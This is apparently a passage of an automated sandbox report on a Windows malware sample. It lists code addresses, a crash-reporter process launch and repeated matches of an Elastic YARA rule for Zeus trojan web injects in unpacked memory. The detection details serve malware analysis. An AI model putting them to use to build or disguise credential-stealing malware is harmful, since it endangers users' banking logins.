Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013633606_2_01363360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013593406_2_01359340
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135EBB06_2_0135EBB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01354B906_2_01354B90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0133D3806_2_0133D380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135BA606_2_0135BA60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01328A506_2_01328A50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135D2506_2_0135D250
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135F2806_2_0135F280
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01328DA06_2_01328DA0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013554F06_2_013554F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135E4E06_2_0135E4E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01347F606_2_01347F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01323FB06_2_01323FB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01366FE36_2_01366FE3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01328FC06_2_01328FC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135AE006_2_0135AE00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013536F06_2_013536F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013556D06_2_013556D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0135C6C06_2_0135C6C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03236B6010_2_03236B60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03212BB010_2_03212BB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03217BC010_2_03217BC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03249A0010_2_03249A00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324F24010_2_0324F240
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032422F010_2_032422F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324B2C010_2_0324B2C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032442D010_2_032442D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032179A010_2_032179A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032561E310_2_032561E3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324D0E010_2_0324D0E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032440F010_2_032440F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03251F6010_2_03251F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03247F4010_2_03247F40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324D7B010_2_0324D7B0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322BF8010_2_0322BF80
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324379010_2_03243790
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324A66010_2_0324A660
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321765010_2_03217650
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324BE5010_2_0324BE50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0324DE8010_2_0324DE80
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0323D58010_2_0323D580
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03248D9010_2_03248D90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A934010_2_030A9340
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030B336010_2_030B3360
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0308D38010_2_0308D380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A4B9010_2_030A4B90
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AEBB010_2_030AEBB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03078A5010_2_03078A50
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AD25010_2_030AD250
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030ABA6010_2_030ABA60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AF28010_2_030AF280
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0309E98010_2_0309E980
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030B099D10_2_030B099D
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AA19010_2_030AA190
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03097F6010_2_03097F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03073FB010_2_03073FB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03078FC010_2_03078FC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030B6FE310_2_030B6FE3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AAE0010_2_030AAE00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AC6C010_2_030AC6C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A56D010_2_030A56D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A36F010_2_030A36F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03078DA010_2_03078DA0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AE4E010_2_030AE4E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A54F010_2_030A54F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 764
Source: WlCVLbzNph.exe
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Matched rule: Windows_Trojan_Zeus_e51c60d7
reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
The rule matched in each of the following sources (type: UNPACKEDPE):
Source: 2.3.svchost.exe.886000.4.raw.unpack
Source: 2.3.svchost.exe.f280000.32.raw.unpack
Source: 2.3.svchost.exe.f280000.35.unpack
Source: 20.2.nPtwtzGyOdAtB.exe.13a2000.1.unpack
Source: 2.3.svchost.exe.2d30000.19.unpack
Source: 13.2.nPtwtzGyOdAtB.exe.2f62000.1.unpack
Source: 25.2.nPtwtzGyOdAtB.exe.e72000.0.unpack
Source: 22.2.nPtwtzGyOdAtB.exe.2cf0000.2.unpack
Source: 15.2.nPtwtzGyOdAtB.exe.2b52000.1.raw.unpack
Source: 2.3.svchost.exe.f280000.47.raw.unpack
Source: 32.2.nPtwtzGyOdAtB.exe.26b2000.1.raw.unpack
Source: 0.2.WlCVLbzNph.exe.407000.2.unpack
Source: 13.2.nPtwtzGyOdAtB.exe.3160000.2.raw.unpack
Source: 6.2.nPtwtzGyOdAtB.exe.1380000.2.raw.unpack
Source: 0.3.WlCVLbzNph.exe.5c82a8.1.raw.unpack
Source: 2.3.svchost.exe.f280000.44.unpack
Source: 2.3.svchost.exe.5830000.17.raw.unpack
Source: 2.3.svchost.exe.f280000.24.unpack
Source: 2.3.svchost.exe.f280000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nPtwtzGyOdAtB.exe.1202000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nPtwtzGyOdAtB.exe.2a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.nPtwtzGyOdAtB.exe.e72000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.46.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nPtwtzGyOdAtB.exe.2d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nPtwtzGyOdAtB.exe.1012000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
